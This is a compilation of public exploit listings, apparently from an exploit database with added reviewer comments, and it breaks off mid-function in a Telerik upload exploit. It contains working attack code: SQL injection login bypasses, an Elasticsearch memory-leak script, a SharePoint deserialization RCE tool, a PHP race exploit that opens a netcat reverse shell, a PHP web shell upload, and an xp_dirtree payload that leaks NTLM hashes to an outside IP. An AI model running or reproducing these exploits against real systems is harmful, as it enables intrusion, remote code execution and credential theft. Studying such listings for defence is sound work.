params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]

PoC POST data payload (authbypass):
-----------------------------------

POST /http/index.php HTTP/1.1
Host: 192.168.1.3

requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]

(The closing quote after 1=1-- was missing in the original listing, which left the params JSON unparseable. Note that MySQL/MariaDB only treat "--" as a comment when it is followed by whitespace, so a trailing space after it may be needed depending on how the server assembles the query.)

ElasticSearch 7.13.3 - Memory disclosure

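#!/usr/bin/python3
# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure
# Date: 21/07/2021
# Exploit Author: r0ny
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://github.com/elastic/elasticsearch
# Version: 7.10.0 to 7.13.3
# Tested on: Kali Linux
# CVE : CVE-2021-22145
"""CVE-2021-22145 PoC.

Sends an invalid JSON body to ``/_bulk``; the error document Elasticsearch
returns quotes the request source as ``(byte[])"..."`` and, on affected
versions, that excerpt reportedly contains bytes beyond the request body
(the memory disclosure). Only the HTTP round trips need ``requests``; the
version check and error parsing are plain functions so they can be tested
without network access. ``packaging`` is no longer required: versions are
compared as integer tuples.

Fixes over the original listing: the shebang had no ``!``; the usage message
referred to a ``-host`` option the parser never defined; a bare ``except:``
hid parse errors; an empty ``Authorization:`` header was sent when no
credential was given; a patched server (no source excerpt in the error)
crashed with IndexError instead of a message.
"""
from argparse import ArgumentParser
import json
import re
import sys

VULNERABLE_MIN = (7, 10, 0)
VULNERABLE_MAX = (7, 13, 3)
BULK_ENDPOINT = "/_bulk"
# A lone '@' is not valid JSON, so the parser fails on the first byte and the
# error message quotes the source buffer from that point.
PAYLOAD = "@\n"
_LEAK_RE = re.compile(r'\(byte\[\]\)"(.*?)"; line', re.S)


def parse_version(text):
    """Turn '7.13.3' (or '7.13.3-SNAPSHOT') into a comparable (7, 13, 3) tuple.

    Raises:
        ValueError: when fewer than three numeric components are present.
    """
    parts = re.findall(r"\d+", text)[:3]
    if len(parts) != 3:
        raise ValueError("unrecognised Elasticsearch version string: {!r}".format(text))
    return tuple(int(p) for p in parts)


def is_vulnerable(es_version):
    """True when *es_version* lies within 7.10.0 .. 7.13.3 inclusive."""
    return VULNERABLE_MIN <= parse_version(es_version) <= VULNERABLE_MAX


def build_auth_header(api_key, basic):
    """Return the Authorization header dict for the supplied credential, or {}.

    An API key wins over basic auth when both are given (as in the original).
    No header is sent when neither is set.
    """
    if api_key:
        return {"Authorization": "ApiKey " + api_key}
    if basic:
        return {"Authorization": "Basic " + basic}
    return {}


def extract_leak(error_response):
    """Pull the two quoted source excerpts out of a /_bulk error document.

    Args:
        error_response: parsed JSON body, expected to carry
            ``error.root_cause[0].reason`` and ``error.reason``.

    Returns:
        ``(leak1, leak2)``: the text between ``(byte[])"`` and ``"; line`` in
        each reason string (the original kept the closing quote; it is
        dropped here).

    Raises:
        ValueError: when either reason is missing or has no source excerpt
            (e.g. a patched server or a different error).
    """
    try:
        reasons = (
            error_response["error"]["root_cause"][0]["reason"],
            error_response["error"]["reason"],
        )
    except (KeyError, IndexError, TypeError) as exc:
        raise ValueError("unexpected error document: {}".format(exc)) from exc
    leaks = []
    for reason in reasons:
        match = _LEAK_RE.search(reason)
        if match is None:
            raise ValueError("no '(byte[])' source excerpt in reason: {!r}".format(reason))
        leaks.append(match.group(1))
    return tuple(leaks)


def main():
    """Parse arguments, check the server version, send the payload and print the leak."""
    import requests  # third-party; local import keeps the helpers importable without it
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    print("\n################################################################################################")
    print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######")
    print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######")
    print("################################################################################################\n")

    parser = ArgumentParser()
    parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
    parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
    parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
    args = parser.parse_args()
    if not args.url:
        parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -u http://127.0.0.1:9200"')

    headers = build_auth_header(args.api_key, args.basic)

    # Check elasticsearch version
    try:
        r = requests.get(args.url, headers=headers, verify=False, timeout=10)
    except requests.RequestException as exc:
        print("# Couldn't connect to " + args.url + ": " + str(exc) + "\n")
        sys.exit(1)
    try:
        es_version = json.loads(r.content)["version"]["number"]
    except (ValueError, KeyError, TypeError):
        print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
        print("# Server response: " + str(r.content))
        sys.exit(1)

    try:
        vulnerable = is_vulnerable(es_version)
    except ValueError as exc:
        print("# " + str(exc))
        sys.exit(1)
    if not vulnerable:
        print("# Elastic Service not vulnerable")
        print("# Elastic Service version: " + es_version)
        print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3")
        sys.exit(0)

    # Exploitation
    url = args.url + BULK_ENDPOINT
    print("# ElasticSearch Version: " + es_version)
    print("# Request to " + url + "\n")
    post_headers = dict(headers)
    post_headers["content-type"] = "application/json"
    r = requests.post(url, data=PAYLOAD, headers=post_headers, verify=False, timeout=10)

    # Read Memory Leak and remove stacktrace
    print("$$$$$$$$$$$$$$$$$$$$$$$$$")
    print("$$$$$ Memory Leaked $$$$$")
    print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
    try:
        leak1, leak2 = extract_leak(json.loads(r.content))
    except ValueError as exc:
        print("# Could not find leaked bytes in the response ({}); raw body follows:".format(exc))
        print(r.content)
        sys.exit(1)
    print(leak1 + "\n" + leak2)


if __name__ == "__main__":
    main()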

Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)

# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC) # Date: 25.07.2021 # Vendor Homepage:https://www.leawo.org # Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html # Exploit Author: Achilles # Tested Version: 11.0.0.1 # Tested on: Windows 7 x64 # 1.- Run python code : # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Leawo Prof. Media # 4.- Click Activation Center # 5.- Paste the content of EVIL.txt into the Field: 'Keycode' # 6.- Click 'Register' and you will see a crash. #!/usr/bin/env python buffer =3D "\x41" * 6000 try: f = open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

Microsoft SharePoint Server 2019 - Remote Code Execution (2)

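#!/usr/bin/python
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
"""CVE-2020-1147 PoC: DataSet deserialization through quicklinks.aspx.

The ``__SUGGESTIONSCACHE__`` form field of ``/_layouts/15/quicklinks.aspx``
(or ``quicklinksdialogform.aspx``) is posted as a DataSet XML document whose
``pwn`` column is typed as ``ExpandedWrapper<LosFormatter, ObjectDataProvider>``
with ``MethodName=Deserialize``, so the row value — a LosFormatter gadget from
ysoserial.net — is deserialized server-side. Requests authenticate with NTLM
as the supplied domain user.

Changes from the original listing (which was Python 2 only): the ``urllib``
import falls back to ``urllib.parse``; ``dict.iteritems()`` is gone; the
whitespace squeeze in clean() is restored to two-spaces-to-one (the collapsed
listing showed a loop that could never terminate); the password is no longer
echoed to stdout. The serialized gadget blob was stripped from this listing
and must be regenerated (see the class comment) before use.
"""
from sys import argv, exit, stdout, stderr
import argparse
import logging
import requests
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
try:
    from urllib import quote, unquote  # Python 2 (as in the original)
except ImportError:
    from urllib.parse import quote, unquote  # Python 3


class Exploit(object):
    """Builds and sends the CVE-2020-1147 DataSet payload to a SharePoint page.

    Attributes set in __init__:
        username: 'DOMAIN\\user' as requests_ntlm expects it.
        session:  a requests.Session reused for every call.
        proxies:  http/https proxy dict, empty when no proxy was given.
        headers, cookies, query_params, form_values: request pieces that
            send_payload() fills in; parse_page() can refresh form_values from
            a fetched page (not used by default, see send_payload()).
        payload:  the DataSet XML with the gadget spliced in.
    """

    # To generate the gadget use:
    # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
    # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
    # NOTE: the blob was removed from this listing; paste the ysoserial.net
    # output here before running.
    gadget = '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'
    control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
    control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
    control_path = control_path_quicklinks

    # DataSet XML: the schema types column 'pwn' so that reading the row hands
    # the {GADGET} string to LosFormatter.Deserialize.
    payload_template = """\
<DataSet>
  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
    <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
      <xs:complexType>
        <xs:choice minOccurs="0" maxOccurs="unbounded">
          <xs:element name="Exp_x0020_Table">
            <xs:complexType>
              <xs:sequence>
                <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
              </xs:sequence>
            </xs:complexType>
          </xs:element>
        </xs:choice>
      </xs:complexType>
    </xs:element>
  </xs:schema>
  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
    <somedataset>
      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">
        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
          <ExpandedElement/>
          <ProjectedProperty0>
            <MethodName>Deserialize</MethodName>
            <MethodParameters>
              <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
          </ProjectedProperty0>
        </pwn>
      </Exp_x0020_Table>
    </somedataset>
  </diffgr:diffgram>
</DataSet>"""

    def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''):
        """Prepare the session, credentials and the gadget-bearing payload.

        Args:
            redirect: whether requests may follow redirects.
            proxy_address: 'host:port' for an HTTP proxy (e.g. Burp), or ''.
            username, domain, password: NTLM credentials.
            target: 'http(s)://host' without a trailing path.
        """
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (domain, username)
        self.target = target
        self.password = password
        self.session = requests.session()
        self.redirect = redirect
        # Declared but never passed to requests in the original; kept for
        # compatibility. Requests therefore have no timeout.
        self.timeout = 0.5
        self.proxies = {
            'http': 'http://%s' % proxy_address,
            'https': 'http://%s' % proxy_address
        } \
            if proxy_address is not None \
            and proxy_address != '' else {}
        self.headers = {}
        self.query_params = {
            'Mode': "Suggestion"
        }
        self.form_values = {
            '__viewstate': '',
            '__SUGGESTIONSCACHE__': ''
        }
        self.cookies = {}
        self.payload = self.payload_template.replace('{GADGET}', self.gadget)

    def do_get(self, url, params=None, data=None):
        """GET *url* through the session with NTLM auth, proxies and the redirect policy applied."""
        return self.session.get(
            url=url,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            data=data,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def do_post(self, url, data=None, params=None):
        """POST *data* to *url* with the same session/auth settings as do_get()."""
        return self.session.post(
            url=url,
            data=data,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def parse_page(self, content):
        """Refresh self.form_values from the hidden inputs found in *content* (HTML).

        Only keys already present in form_values are looked up; a missing
        input or value is reported on stderr and the old value is kept.
        """
        soup = BeautifulSoup(content, 'lxml')
        for key in list(self.form_values):
            try:
                for tag in soup.select('input[name=%s]' % key):
                    try:
                        self.form_values[key] = tag['value']
                    except Exception as error:
                        stderr.write('error for key %s error %s\n' % (key, str(error)))
            except Exception as error:
                stderr.write('error for selector %s error %s\n' % (key, str(error)))
        return self

    def debug(self):
        """Turn on http.client/urllib3 wire logging."""
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def clean(self, payload):
        """Flatten the XML onto one line: drop CR/LF and squeeze runs of spaces to one."""
        payload = payload.replace('\n', '').replace('\r', '')
        while '  ' in payload:
            payload = payload.replace('  ', ' ')
        return payload

    def get_form(self):
        """Fetch the control page and harvest its hidden form fields into form_values."""
        url = '%s%s' % (self.target, self.control_path)
        resp = self.do_get(url=url, params=self.query_params)
        self.parse_page(content=resp.content)
        return resp

    def send_payload(self):
        """POST the DataSet XML in __SUGGESTIONSCACHE__ (with an empty __viewstate) and return the response."""
        url = '%s%s' % (self.target, self.control_path)
        # self.get_form()  -- left disabled in the original; the POST goes out with an empty __viewstate
        self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
        self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
        self.form_values['__viewstate'] = ''
        resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
        return resp


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
    try:
        parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ')
        parser.add_argument("-username", action='store', default='', help='Username to use: first.last')
        parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local')
        parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020')
        # -both and -debug take a value; any non-empty value (even "False")
        # enables them because the string is tested for truthiness.
        parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
        parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False')
        parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()
        exp = Exploit(
            proxy_address=options.proxy,
            username=options.username,
            domain=options.domain,
            password=options.password,
            target=options.target
        )
        if options.debug:
            exp.debug()
        # The password is masked: the original echoed it in clear to stdout.
        stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
            options.target,
            options.username,
            options.domain,
            '*' * len(options.password),
            options.debug,
            options.proxy
        ))
        result = exp.send_payload()
        stdout.write('Response: %d\n' % result.status_code)
        if 'MicrosoftSharePointTeamServices' in result.headers:
            stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])
        if options.both and result.status_code != 200:
            exp.control_path = exp.control_path_quicklinksdialogform
            stdout.write('Trying alternate page\n')
            result = exp.send_payload()
            stdout.write('Response: %d\n' % result.status_code)
    except Exception as error:
        stderr.write('error in main %s' % str(error))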
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3
# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat

#!/usr/bin/python3
"""
Usage :
python3 poc.p <Target URL> <ListnerIP> <ListnerPORT>
python3 poc.py https://xyz.xyz 192.168.1.15 1337
"""
import requests
import threading
import datetime
import sys

# Wall-clock deadline shared by all workers: 10 seconds after module import.
x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds


def fuzz() -> None:
    """Worker body: repeat the multipart POST until the 10-second deadline passes.

    Reads the target URL, listener IP and listener port straight from sys.argv;
    the only validation is the argc check in __main__. A new requests.Session is
    created on every iteration, so nothing is reused between requests, and the
    response is never inspected.
    """
    targetIP = sys.argv[1]
    listnerIP = sys.argv[2]
    listnerPORT = sys.argv[3]
    global newDatetime  # declared global but only read here; the statement is redundant
    while True:
        try:
            # exit() raises SystemExit, which ends only this worker thread;
            # main() and the other workers are unaffected.
            if datetime.datetime.now() > newDatetime:
                exit()
            # proxies = {
            #     "http": "http://127.0.0.1:8080",
            #     "https": "https://127.0.0.1:8080",
            # }
            sessionName = "SiLvER"
            url = targetIP
            s = requests.Session()
            cookies = {'PHPSESSID': sessionName}
            # Defensive note: the observable request shape is a multipart POST with a
            # fixed PHPSESSID cookie and a PHP_SESSION_UPLOAD_PROGRESS form field whose
            # value starts with "<?php" - a usable WAF/IDS signature. The primitive goes
            # away with session.upload_progress.enabled=Off in php.ini; the application's
            # file-inclusion parameter (see `params` below) is the root cause to fix.
            files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
            # You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
            # The query parameter points the include at the PHP session file for PHPSESSID above.
            params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
            # verify=False: TLS certificate errors are ignored; allow_redirects=False: a
            # redirect ends the request without being followed.
            x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
        except Exception as error:
            # Any error (network, bad URL) ends this worker only.
            print(error)
            exit()


def main() -> None:
    """Start 20 fuzz() workers.

    NOTE(review): `thread.join` is an attribute access, not a call, so main()
    returns immediately; the process still stays alive until the non-daemon
    workers hit the deadline in fuzz().
    """
    print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
    threads = []
    for _ in range(20):
        t = threading.Thread(target=fuzz)
        t.start()
        threads.append(t)
    for thread in threads:
        thread.join


if __name__ == "__main__":
    # Requires exactly: <Target URL> <ListnerIP> <ListnerPORT>; extra arguments are ignored.
    if len(sys.argv) < 4:
        print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
        print("\n(=) By SiLvER \n")
        exit()
    else:
        main()
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro

import os, re, sys, argparse, requests
from termcolor import cprint


def banner():
    """Clear the console and print the ASCII banner.

    `cls` is the Windows clear-screen command; on other platforms the shell
    just reports an unknown command. The banner's original line breaks and
    alignment were lost in the archived copy below.
    """
    os.system("cls")
    print(''' ___________ __ \_ _____/__ __ ____ _____/ |_ | __)_\ \/ // __ \ / \ __\\ | \\\\ /\ ___/| | \ | /_______ / \_/ \___ >___| /__| \/ \/ \/ Registration System --[Authentication Bypass and RCE]-- @jjavierolmedo ''')


def get_args():
    """Parse -t/--target (required) and -p/--proxy (optional) from argv."""
    parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
    parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
    parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
    args = parser.parse_args()
    return args


def auth_bypass(s, proxies, url):
    """POST a login whose username ends in a SQL comment and return the session on success.

    Success is detected by the literal '{"status":"success"}' in the response
    body; any other response exits the process. Defensive note: the login
    handler evidently builds its query from the raw username - parameterized
    queries in Login.php close this, and a username containing `'#` in a
    login POST is a simple detection signature.
    """
    data = {
        "username":"admin'#",
        "password":""
    }
    r = s.post(url, data=data, proxies=proxies)
    if('{"status":"success"}' in r.text):
        cprint("[+] Authenticacion Bypass Success!\n", "green")
        return s
    else:
        cprint("[-] Authenticacion Bypass Error!\n", "red")
        sys.exit(0)


def upload_shell(s, proxies, url):
    """Upload a PHP file through the settings form's `img` field using the authenticated session.

    Success means HTTP 200 with a '1' anywhere in the body - a weak check that
    also matches unrelated responses. Defensive note: the server accepts and
    later serves a .php file from /event/uploads/; an extension allowlist,
    storage outside the web root and disabling PHP execution in the uploads
    directory are the mitigations, and a multipart POST to SystemSettings.php
    carrying a .php filename is the thing to alert on.
    """
    content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
    file = {
        'img':('cmd.php',content)
    }
    data = {
        "name":"Event Registration System with QR Code - PHP",
        "short_name":"ERS-QR-PHP",
    }
    r = s.post(url, files=file, data=data, proxies=proxies)
    if('1' in r.text and r.status_code == 200):
        cprint("[+] Upload Shell Success!\n", "green")
        return s
    else:
        cprint("[-] Upload Shell Error!\n", "red")
        sys.exit(0)


def get_shell_url(s, proxies, url):
    """Fetch the uploads directory and print the stored file's name.

    Appears to rely on an HTML directory listing (the regex matches an
    `<a>` inside `<li>`); `re.findall(...)[0]` raises IndexError when there is
    no match. Returns None, so the caller's `s = get_shell_url(...)` drops the
    session. NOTE(review): the printed URL hard-codes http://localhost instead
    of the -t target, and `\_` is an invalid escape in both Python and regex.
    """
    r = s.get(url, proxies=proxies)
    regex = '\_cmd.php"> (.*?)</a></li>'
    shell_name = re.findall(regex, r.text)[0]
    url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
    cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")


def main():
    """Run the three steps in order: login bypass, upload, locate the file.

    The proxy, when given, is applied to both http and https; an empty proxy
    string is passed otherwise. All three URLs are built by string
    concatenation on the raw -t value, so a trailing slash produces '//'.
    """
    banner()
    args = get_args()
    target = args.target
    proxies = {'http':'','https':''}
    if args.proxy:
        proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}
    login_url = target + "/event/classes/Login.php?f=rlogin"
    upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
    shell_url = target + "/event/uploads/"
    s = requests.Session()
    s = auth_bypass(s, proxies, login_url)
    s = upload_shell(s, proxies, upload_url)
    s = get_shell_url(s, proxies, shell_url)


if __name__ == "__main__":
    # Only Ctrl-C is handled; network errors propagate as tracebacks.
    try:
        main()
    except KeyboardInterrupt:
        cprint("[-] User aborted session\n", "red")
        sys.exit(0)

# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo

TripSpark VEO Transportation - Blind SQL Injection

# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection # Google Dork: inhtml:"Student Busing Information" # Date: 07/27/2021 # Exploit Author: Sedric Louissaint @L_Kn0w # Vendor Homepage: https://www.tripspark.com # Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf # Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084 # OS Tested on: Microsoft Windows Server 2012 R2 Standard # Vender Notified: 01/19/2021 # Confirmed Patch was released : 06/15/2021 # Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability. # PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound). ``` POST / HTTP/1.1 Host: vulnerable.site.net User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 4700 Origin: vulnerable.site.net Connection: close Referer: https:// vulnerable.site.net Cookie: ASP.NET_SessionId=x Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 __VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit ```
# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)
# Date: 21/03/2021
# Exploit Author: Amin Bohio
# Original Research & Code By: Paul Taylor / Foregenix Ltd
# Original Exploit: https://github.com/bao7uo/RAU_crypto
# Vendor Homepage: https://www.gfi.com
# Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver
# Vulnerable Versions: GFI Mail Archiver <= 15.1
# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference
# Tested on: Windows & Linux
# Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver

#!/usr/bin/python3
# Original Telerik Exploit Author: Paul Taylor / @bao7uo
# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py
# Modified by: Amin Bohio
#
# Reviewer summary (defensive): every request this tool sends goes to
# Telerik.Web.UI.WebResource.axd?type=rau, uses the fixed multipart boundary
# ---------------------------62616f37756f2f and the fixed fileName value
# "RAU_crypto.bypass" - all three are usable as detection signatures. The
# tool only works while the target still uses the default hard-coded keys in
# RAUCipher below, so non-default keys plus the vendor patches referenced in
# the header are the mitigation.

import sys
import base64
import json
import re
import requests
import os
from Crypto.Cipher import AES
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
from Crypto.Hash import SHA1
from struct import Struct
from operator import xor
from itertools import starmap
import binascii
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# ******************************************
# ******************************************
# ADVANCED_SETTINGS section 1 of 2
# Warning, the below prevents certificate warnings,
# and verify = False (CERT_VERIFY prevents them being verified
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
CERT_VERIFY = False
# ******************************************
# ******************************************


class PBKDF:
    """Key-derivation helpers for the two schemes selected by RAUCipher.PBKDF_ALGORITHM.

    All methods are plain functions invoked as PBKDF.<name>(...) - none takes
    `self`. derive2 stores its keyed HMAC context in the class attribute
    PBKDF.mac, which hmacsha1 reads (hidden coupling: hmacsha1 before derive2
    raises AttributeError).
    """

    def sha1(v):
        # Single SHA1 digest of v (bytes in, bytes out).
        hl = SHA1.new()
        hl.update(v)
        return hl.digest()

    def derive1(password, salt):
        # Scheme 1: SHA1 applied 100 times in total to password+salt (99 in the
        # loop plus one more), then extended to at least 48 bytes with
        # counter-prefixed digests.
        hash = (password + salt).encode()
        for i in range(0, 99):
            hash = PBKDF.sha1(hash)
        result = PBKDF.sha1(hash)
        i = 1
        while len(result) < 48:
            result += PBKDF.sha1(str(i).encode() + hash)
            i += 1
        return result

    def hmacsha1(v):
        # HMAC-SHA1 of v under the key fixed by derive2 (copied so the stored
        # context is never advanced).
        hl = PBKDF.mac.copy()
        hl.update(v)
        return bytearray(hl.digest())

    def derive2(password, salt):
        # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py
        # Scheme 2: PBKDF2-HMAC-SHA1 structure - one initial HMAC plus 999
        # iterations (1000 rounds) per output block, truncated to 48 bytes.
        result_length = 48
        PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new())
        result = []
        for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1):
            rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b))
            for i in range(999):
                u = PBKDF.hmacsha1(u)
                rv = starmap(xor, zip(rv, u))
            result.extend(rv)
        result = b''.join(map(bytes, [result]))[:result_length]
        return result

    def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])):
